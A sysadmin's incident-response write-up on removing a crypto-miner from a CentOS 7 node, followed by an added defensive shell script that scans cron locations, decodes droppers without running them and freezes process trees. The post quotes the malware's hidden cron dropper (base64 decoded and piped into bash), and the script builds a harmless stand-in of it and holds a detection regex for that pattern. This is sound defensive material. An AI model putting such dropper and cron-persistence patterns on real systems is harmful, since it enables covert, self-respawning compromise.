Back-end team, taking over a new environment. At handover my colleague mentioned that these machines were already infected with a crypto-mining virus and had not been reinstalled yet. Damn. Production boxes cannot simply be rebuilt, so the only option is to hunt the thing down and remove it by hand. The operating system:

```
[root@k8s-node7 ~]# cat /etc/redhat-release
CentOS Linux release 7.5.1804 (Core)
```

Processes first. SSH in and look at ps -ef: kill the miner process by hand and a new one appears within seconds, so there is evidently a watchdog process that respawns it. Instead of killing, freeze both with SIGSTOP. A stopped process does not exit, so the watchdog has nothing to react to while the persistence is being cleaned up:

```
[root@k8s-node7 ~]# kill -STOP 165224
[root@k8s-node7 ~]# kill -STOP 223135
```

Next, check the scheduled tasks and clean them out. The root crontab runs a hidden script every hour; the script is a dropper that decodes an embedded base64 blob and pipes it straight into bash (`rm -f !$` reuses the last argument of the previous command, and bash echoes the expanded command line):

```
[root@k8s-node7 ~]# crontab -l
8 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 ~]# cat /root/.systemd-service.sh
#!/bin/bash
exec &> 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 | base64 -d | bash
[root@k8s-node7 ~]# rm -f !$
rm -f /root/.systemd-service.sh
```

Then carry on through the other cron locations: /var/spool/cron/, /etc/crontab, /etc/cron* and so on. There is a second entry in /etc/cron.d (system crontab format, with the user field). Note that it points at a second copy of the script, /opt/systemd-service.sh, which has to be removed as well, not just the cron file:

```
[root@k8s-node7 crontabs]# cd /etc/cron.d
[root@k8s-node7 cron.d]# ls
0systemd-service
[root@k8s-node7 cron.d]# cat 0systemd-service
9 * * * * root /opt/systemd-service.sh > /dev/null 2>&1 &
[root@k8s-node7 cron.d]# pwd
/etc/cron.d
[root@k8s-node7 cron.d]# rm -f 0systemd-service
[root@k8s-node7 ~]# ll -d /etc/cron.*
drwxr-xr-x. 2 root root 4096 Mar 10 11:01 /etc/cron.d
drwxr-xr-x. 2 root root 4096 Dec 18 15:31 /etc/cron.daily
-rw-------. 1 root root    0 Apr 11  2018 /etc/cron.deny
drwxr-xr-x. 2 root root 4096 Sep 25  2019 /etc/cron.hourly
drwxr-xr-x. 2 root root 4096 Jun 10  2014 /etc/cron.monthly
drwxr-xr-x. 2 root root 4096 Jun 10  2014 /etc/cron.weekly
[root@k8s-node7 ~]# ll -d /etc/cron.*/*
-rwx------. 1 root root 219 Apr 11  2018 /etc/cron.daily/logrotate
-rwxr-xr-x. 1 root root 392 Apr 11  2018 /etc/cron.hourly/0anacron
-rwxr-xr-x. 1 root root 191 Apr 11  2018 /etc/cron.hourly/mcelog.cron
```

The remaining entries (logrotate, 0anacron, mcelog.cron) are stock CentOS. The boot directory and the other startup locations still need to be checked and cleaned one by one. Only then kill the processes that were stopped earlier, watch for a while, and see whether anything comes back. Use kill -KILL for this: a plain SIGTERM is left pending on a stopped process until it is continued, while SIGKILL is acted on immediately.
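As an added example (not code from the original post), the script below automates the hunt described above: it sweeps every cron location for entries that match this miner's persistence, lists every script those entries execute so that each copy (the post found one under /root and one under /opt) gets removed, decodes the base64 dropper without running it, and freezes a process tree with SIGSTOP the way the post does before cleanup. The sandbox it builds under mktemp, the file contents, the detection regex and the dropper's `exec &>/dev/null` line are all constructed for illustration; the real dropper's blob and redirect target were not preserved in the post. Process discovery reads /proc and therefore assumes Linux.

```shell
#!/bin/bash
# Added example (not from the original post). Hunts for the cron persistence
# used by the miner above and freezes its process tree before cleanup.
# Every cron path is taken relative to ROOT so it can run against a constructed
# sandbox offline; on a real host pass "/" (assumption: CentOS 7 cron layout).
set -e

# What is flagged (assumption: tuned to this miner, not a general detector):
#   - "base64 -d" piped into a shell
#   - a hidden *.sh under /root, or anything named systemd-service.sh
SUSPICIOUS_RE='base64 +-d.*[|] *(ba)?sh|/root/\.[A-Za-z0-9_.-]+\.sh|[^ ]*systemd-service\.sh'

# scan_cron ROOT: print "file:lineno:entry" for each suspicious cron entry.
scan_cron() {
  local root="${1%/}" f
  for f in "$root"/var/spool/cron/* "$root"/etc/crontab "$root"/etc/cron.d/* \
           "$root"/etc/cron.hourly/* "$root"/etc/cron.daily/* \
           "$root"/etc/cron.weekly/* "$root"/etc/cron.monthly/*; do
    [ -f "$f" ] || continue
    grep -En "$SUSPICIOUS_RE" "$f" | sed "s|^|$f:|"
  done
  return 0
}

# referenced_scripts ROOT: the scripts those entries run, one per line, so every
# copy is removed (the post's two entries pointed at /root and /opt copies).
referenced_scripts() {
  scan_cron "$1" | cut -d: -f3- | grep -Eo '/[^ >]*\.sh' | sort -u
}

# decode_dropper FILE: show what an "echo <b64> | base64 -d | bash" dropper would
# execute, by decoding its first base64 blob instead of piping it to bash.
decode_dropper() {
  grep -Eo '[A-Za-z0-9+/]{16,}={0,2}' "$1" | head -n 1 | base64 -d
}

# children PID: direct children, read from /proc so no ps/pgrep is needed (Linux-only).
children() {
  local pid="$1" s
  for s in /proc/[0-9]*/stat; do
    # everything after the ")" closing the comm field is "state ppid ..."
    [ "$(sed 's/.*) //' "$s" 2>/dev/null | cut -d' ' -f2)" = "$pid" ] && basename "${s%/stat}"
  done
  return 0
}

# freeze_tree PID: SIGSTOP the children first, then PID, printing every pid stopped.
# A stopped miner never exits, so a watchdog parent has nothing to respawn while
# the cron entries are removed; finish with kill -KILL, since SIGTERM stays pending
# on a stopped process until it is continued.
freeze_tree() {
  local pid="$1" child
  for child in $(children "$pid"); do freeze_tree "$child"; done
  if kill -STOP "$pid" 2>/dev/null; then echo "$pid"; fi
  return 0
}

# make_sandbox: a constructed fake root mirroring the layout from the post.
# The dropper's redirect target and blob were elided from the post; these are stand-ins.
make_sandbox() {
  local root blob
  root=$(mktemp -d)
  mkdir -p "$root/var/spool/cron" "$root/etc/cron.d" "$root/etc/cron.daily" "$root/root" "$root/opt"
  blob=$(printf 'echo "stage2 would run here"\n' | base64 | tr -d '\n')
  printf '#!/bin/bash\nexec &>/dev/null\necho %s | base64 -d | bash\n' "$blob" > "$root/root/.systemd-service.sh"
  cp "$root/root/.systemd-service.sh" "$root/opt/systemd-service.sh"
  echo '8 * * * * /root/.systemd-service.sh > /dev/null 2>&1 &' > "$root/var/spool/cron/root"
  echo '9 * * * * root /opt/systemd-service.sh > /dev/null 2>&1 &' > "$root/etc/cron.d/0systemd-service"
  # a legitimate stock entry that must not be flagged
  printf '#!/bin/sh\n/usr/sbin/logrotate /etc/logrotate.conf\n' > "$root/etc/cron.daily/logrotate"
  echo "$root"
}

# Demo run against the sandbox (on a real host: scan_cron / and act on the output).
sandbox=$(make_sandbox)
echo "# suspicious cron entries:";                scan_cron "$sandbox"
echo "# scripts those entries run (remove all):"; referenced_scripts "$sandbox"
echo "# dropper payload, decoded not executed:";  decode_dropper "$sandbox/root/.systemd-service.sh"
rm -rf "$sandbox"
```

On a live host the order matters: freeze the miner and its watchdog with `freeze_tree`, then remove what `scan_cron` and `referenced_scripts` report, then `kill -KILL` the frozen pids. Decoding the dropper first tells you which other locations (services, rc scripts, SSH keys) the second stage touched, which is what the manual sweep of the boot directory is trying to find.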
